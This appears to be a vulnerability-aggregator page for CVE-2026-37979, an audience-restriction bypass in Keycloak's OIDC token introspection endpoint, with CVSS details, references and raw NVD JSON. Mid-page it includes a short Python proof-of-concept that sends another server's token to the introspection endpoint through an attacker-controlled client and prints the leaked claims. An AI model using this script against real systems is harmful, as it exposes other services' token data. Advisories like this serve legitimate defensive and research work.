CVE-2026-37979

Description

A flaw was found in Keycloak. This access control vulnerability in Keycloak's OpenID Connect (OIDC) token introspection endpoint allows a confidential client to bypass audience restrictions. An attacker-controlled client with valid credentials can retrieve sensitive token claims intended for other resource servers, compromising the confidentiality of lightweight access tokens. This issue can be exploited remotely by any confidential client in the realm with valid credentials.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (具体受影响版本请参考Red Hat安全公告RHSA-2026:19596)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Keycloak Target Configuration
KEYCLOAK_URL = "https://target-keycloak.com/realms/master/protocol/openid-connect/token/introspect"
CLIENT_ID = "attacker-controlled-client"
CLIENT_SECRET = "valid-client-secret"
TARGET_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Token intended for a different resource server

# Exploit Payload
data = {
    "client_id": CLIENT_ID,
    "client_secret": CLIENT_SECRET,
    "token": TARGET_TOKEN
}

response = requests.post(KEYCLOAK_URL, data=data)

if response.status_code == 200:
    result = response.json()
    # If active is true, the attacker successfully bypassed audience restrictions
    if result.get("active"):
        print("[+] Vulnerability Exploited! Token details leaked:")
        print(result)
    else:
        print("[-] Token is inactive or invalid.")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-37979
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-37979
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-37979/
[4] VulDB https://vuldb.com/cve/CVE-2026-37979
[5] https://access.redhat.com/errata/RHSA-2026:19596
[6] https://access.redhat.com/errata/RHSA-2026:19597
[7] https://access.redhat.com/security/cve/CVE-2026-37979
[8] https://bugzilla.redhat.com/show_bug.cgi?id=2455328

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-37979", "sourceIdentifier": "[email protected]", "published": "2026-05-19T12:16:18.330", "lastModified": "2026-05-20T17:16:21.807", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. This access control vulnerability in Keycloak's OpenID Connect (OIDC) token introspection endpoint allows a confidential client to bypass audience restrictions. An attacker-controlled client with valid credentials can retrieve sensitive token claims intended for other resource servers, compromising the confidentiality of lightweight access tokens. This issue can be exploited remotely by any confidential client in the realm with valid credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:19596", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19597", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-37979", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455328", "source": "[email protected]"}]}}